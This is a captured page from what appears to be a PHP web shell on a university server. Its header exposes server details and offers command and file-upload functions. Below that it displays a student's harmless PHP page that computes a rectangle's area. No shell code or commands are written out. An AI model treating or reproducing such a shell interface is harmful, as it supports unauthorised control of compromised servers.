Server IP : 172.16.15.8 / Your IP : 3.142.53.151 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/asbright/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="styling.css"> <title>Area of Rectangle </title> <div style="text-align:center"> <h1> Area of a Rectangle Example </h1> </div> </head> <body> <?php include("navbar.php"); ?> <div style="text-align:center"> <br/> <p> <?php $length = 3; $width = 5; $area = $length*$width; $area = number_format($area, 2); print "A rectangle with length of $length and width of $width<br> The area is $area"; ?> </p> </div> </body> </html>